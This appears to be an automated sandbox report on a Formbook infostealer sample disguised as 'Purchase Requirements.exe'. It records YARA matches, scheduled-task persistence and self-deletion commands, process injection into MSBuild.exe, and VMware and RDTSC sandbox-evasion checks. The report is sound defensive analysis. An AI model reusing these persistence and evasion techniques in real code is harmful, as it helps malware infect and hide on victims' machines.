          Source: Purchase Requirements.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Purchase Requirements.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: UCnSWpQKXBXg.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmpBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
          Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmpBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
          Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
          Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
          Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmpBinary or memory string: *.sln
          Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmpBinary or memory string: MSBuild MyApp.csproj /t:Clean
          Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmpBinary or memory string: /ignoreprojectextensions:.sln
          Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmpBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@8/6
          Source: C:\Users\user\Desktop\Purchase Requirements.exeFile created: C:\Users\user\AppData\Roaming\UCnSWpQKXBXg.exeJump to behavior
          Source: C:\Users\user\Desktop\Purchase Requirements.exeMutant created: \Sessions\1\BaseNamedObjects\dearrPEcQuQxOghVdtiylVmw
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5572:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
          Source: C:\Users\user\Desktop\Purchase Requirements.exeFile created: C:\Users\user\AppData\Local\Temp\tmp47B.tmpJump to behavior
          Source: Purchase Requirements.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Purchase Requirements.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Purchase Requirements.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Purchase Requirements.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Purchase Requirements.exeVirustotal: Detection: 33%
          Source: Purchase Requirements.exeReversingLabs: Detection: 33%
          Source: C:\Users\user\Desktop\Purchase Requirements.exeFile read: C:\Users\user\Desktop\Purchase Requirements.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Purchase Requirements.exe 'C:\Users\user\Desktop\Purchase Requirements.exe'
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UCnSWpQKXBXg' /XML 'C:\Users\user\AppData\Local\Temp\tmp47B.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UCnSWpQKXBXg' /XML 'C:\Users\user\AppData\Local\Temp\tmp47B.tmp'
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
          Source: C:\Users\user\Desktop\Purchase Requirements.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\Purchase Requirements.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Purchase Requirements.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Purchase Requirements.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Purchase Requirements.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: colorcpl.pdbGCTL source: MSBuild.exe, 00000007.00000002.769799256.0000000001129000.00000004.00000020.sdmp
          Source: Binary string: colorcpl.pdb source: MSBuild.exe, 00000007.00000002.769799256.0000000001129000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.710084049.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000007.00000002.770164401.00000000013C0000.00000040.00000001.sdmp, colorcpl.exe, 0000000F.00000002.920589747.00000000043F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MSBuild.exe, colorcpl.exe
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.710084049.0000000005A00000.00000002.00000001.sdmp
          Source: Purchase Requirements.exeStatic PE information: 0xF489FAD9 [Sun Jan 3 18:15:53 2100 UTC]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004150FC push ss; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041B3B5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041B46C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041B402 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041B40B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041C57F push dword ptr [7A69614Dh]; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041B6CC push 24CBA43Eh; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0143D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0446D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02B0BA3A push es; iretd
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02B0B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02B050FC push ss; iretd
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02B0B9C3 push eax; retf
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02B0BEFB pushad ; iretd
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02B0B6CC push 24CBA43Eh; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02B0B402 push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02B0B40B push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02B0B46C push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02B0C57F push dword ptr [7A69614Dh]; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.37998351086
          Source: initial sampleStatic PE information: section name: .text entropy: 7.37998351086
          Source: C:\Users\user\Desktop\Purchase Requirements.exeFile created: C:\Users\user\AppData\Roaming\UCnSWpQKXBXg.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UCnSWpQKXBXg' /XML 'C:\Users\user\AppData\Local\Temp\tmp47B.tmp'
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Purchase Requirements.exe PID: 6556, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000002AF85E4 second address: 0000000002AF85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000002AF897E second address: 0000000002AF8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\Purchase Requirements.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Purchase Requirements.exe TID: 6560Thread sleep time: -43837s >= -30000s
          Source: C:\Users\user\Desktop\Purchase Requirements.exe TID: 6584Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5788Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7120Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Purchase Requirements.exeThread delayed: delay time: 43837
          Source: C:\Users\user\Desktop\Purchase Requirements.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000008.00000000.709716593.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000008.00000000.715203231.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000008.00000000.710623846.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.715203231.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.715378228.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000008.00000000.743758950.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000008.00000000.709716593.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000008.00000000.715378228.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000008.00000000.709716593.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000008.00000000.716003271.000000000A863000.00000004.00000001.sdmpBinary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI
          Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000008.00000000.715513412.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000008.00000000.709716593.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Purchase Requirements.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004088B0 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00409B20 LdrLoadDll,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0140B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0140B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_013E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_013E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_013E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_013EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_013EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_013EC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01404120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01404120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01404120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01404120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01404120 mov ecx, dword ptr fs:[00000030h]
